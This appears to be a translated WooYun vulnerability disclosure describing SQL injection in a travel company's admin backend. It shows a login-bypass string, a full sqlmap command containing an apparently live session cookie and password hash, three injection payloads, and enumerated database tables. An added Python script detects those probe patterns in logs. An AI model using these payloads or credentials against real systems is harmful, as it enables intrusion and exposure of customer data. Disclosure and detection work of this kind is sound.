WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------- http://drop.zone.ci/
2015-09-07: Details reported to the vendor, awaiting vendor handling. 2015-09-12: Vendor chose to ignore the vulnerability; details disclosed to the public.
1. I searched WooYun for weak passwords and came across this report:
WooYun: Kaiyuan Travel backend weak password leads to order leakage
So I fuzzed the site's subdomains and found a backend.

2. The login form at the backend accepts a classic authentication-bypass payload:
http://dhl.kaiyuan.eu/admin.php?action=login
1' or '1'='1

There are two injection points, one GET and one POST.

I.

1. Confirmed with sqlmap (the cookie is the authenticated backend session):
sqlmap.py -u "http://dhl.kaiyuan.eu/admin.php?action=plus_center&plus=book_man&read=b.id&getnew=1&order_export=25830" --cookie "Hm_lvt_58db26aba9239de594be5994f13e63e3=1441508872,1441608262,1441614146,1441614165; __utma=246661406.1888963922.1441092792.1441608262.1441614147.6; __utmz=246661406.1441614147.6.3.utmcsr=wooyun.org|utmccn=(referral)|utmcmd=referral|utmcct=/corps/%E5%BE%B7%E5%9B%BD%E5%BC%80%E5%85%83; pgv_pvi=4010238976; __utma=96885962.2119707681.1441112523.1441165202.1441608507.3; __utmz=96885962.1441112523.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CNZZDATA2923558=cnzz_eid%3D345566589-1441112544-%26ntime%3D1441614173; Hm_lpvt_58db26aba9239de594be5994f13e63e3=1441614165; __utmc=246661406; pgv_si=s1992612864; PHPSESSID=vn2qhd08vo1m9mvr2nd50g9ur5; __jsluid=90192e1357656f0b01c452b014e6b349; cod=49.48.44.45.46.11.47.34.2128812174.2128812234.2128812382.2128812429; csd=2145015660; __utmc=96885962; IESESSION=alive; __utmb=246661406.2.10.1441614147; __utmt=1; lan=zh_CN; bianyou[suid]=10; bianyou[pass]=456c827fb612025052d0cf2e8a6f194e"
2. sqlmap output for the GET parameter:
Parameter: plus (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=plus_center&plus=book_man%' AND 6587=6587 AND '%'='&read=b.id&getnew=1&order_export=25830

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: action=plus_center&plus=book_man%' AND (SELECT 1400 FROM(SELECT COUNT(*),CONCAT(0x717a6a7171,(SELECT (ELT(1400=1400,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&read=b.id&getnew=1&order_export=25830

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: action=plus_center&plus=book_man%' AND SLEEP(5) AND '%'='&read=b.id&getnew=1&order_export=25830
---
back-end DBMS: MySQL 5.0
3. Databases reachable from the injection point:
available databases [11]:
[*] chinesediapers
[*] dhl
[*] fitdiapers
[*] fitsandstone
[*] hi6go
[*] information_schema
[*] kytest
[*] kytour
[*] mysql
[*] test
[*] tour
4. I only enumerated one database and did not look at the others.
Database: dhl
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dhl_integral        | 25476   |
| dhl_order_detail    | 22628   |
| dhl_goods           | 22499   |
| dhl_record          | 22226   |
| dhl_order           | 12105   |
| dhl_order_base      | 11729   |
| dhl_order_bpost     | 10277   |
| dhl_alipay_data     | 7495    |
| dhl_user            | 6506    |
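As an added illustration that is not part of the original report, the three probe shapes sqlmap reported against the `plus` parameter (boolean comparison, the FLOOR(RAND(0)*2) / INFORMATION_SCHEMA error trick, and SLEEP) can be picked out of ordinary web-server access logs. The log lines below are constructed, and the rule names mirror sqlmap's own technique labels:

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the report). The query strings carry the
# same three probe shapes sqlmap reported, URL-encoded as a server would log them.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2015:10:01:02 +0800] "GET /admin.php?action=plus_center&plus=book_man&read=b.id HTTP/1.1" 200 812
10.0.0.5 - - [07/Sep/2015:10:01:03 +0800] "GET /admin.php?action=plus_center&plus=book_man%25%27%20AND%206587%3D6587%20AND%20%27%25%27%3D%27&read=b.id HTTP/1.1" 200 812
10.0.0.5 - - [07/Sep/2015:10:01:04 +0800] "GET /admin.php?action=plus_center&plus=book_man%25%27%20AND%20(SELECT%201400%20FROM(SELECT%20COUNT(*),CONCAT(0x717a6a7171,(SELECT%20(ELT(1400%3D1400,1))),0x717a6b7171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27%25%27%3D%27 HTTP/1.1" 500 0
10.0.0.5 - - [07/Sep/2015:10:01:10 +0800] "GET /admin.php?action=plus_center&plus=book_man%25%27%20AND%20SLEEP(5)%20AND%20%27%25%27%3D%27 HTTP/1.1" 200 812
"""

# Rules are checked in this order; each is named after the sqlmap technique it matches.
RULES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema", re.I)),
    ("boolean-based blind", re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
]
# Pulls the request target out of a combined-format log line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify(value: str):
    """Return the technique name if a decoded parameter value looks like a sqlmap probe."""
    for name, rule in RULES:
        if rule.search(value):
            return name
    return None


def scan_log(text: str):
    """Return (parameter, technique) for every request parameter that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl already percent-decodes, so %25%27 becomes the raw %' seen in the payloads.
        for param, value in parse_qsl(query, keep_blank_values=True):
            technique = classify(value)
            if technique:
                hits.append((param, technique))
    return hits


if __name__ == "__main__":
    for param, technique in scan_log(SAMPLE_LOG):
        print(f"{param}: {technique}")
```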
II. Injection in the add-link form
Severity: no impact, vendor ignored
Ignored on: 2015-09-12 17:16
Vulnerability rank: 4 (WooYun rating)
None yet